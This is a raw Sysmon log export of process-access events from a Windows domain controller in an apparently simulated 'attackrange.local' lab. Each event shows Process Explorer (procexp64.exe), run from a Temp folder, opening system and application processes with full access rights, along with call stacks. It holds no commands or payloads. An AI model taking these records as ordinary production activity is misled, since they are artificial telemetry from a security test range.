15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786231Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786230Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786229Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786228Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786227Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786226Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786225Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786224Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786223Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786222Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786221Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786220Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786219Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786218Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786217Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786216Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786215Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786214Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786213Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786212Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786211Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786210Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786209Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786208Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786207Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786206Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786205Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786204Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786203Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786202Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786201Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786200Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786199Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786198Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786197Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 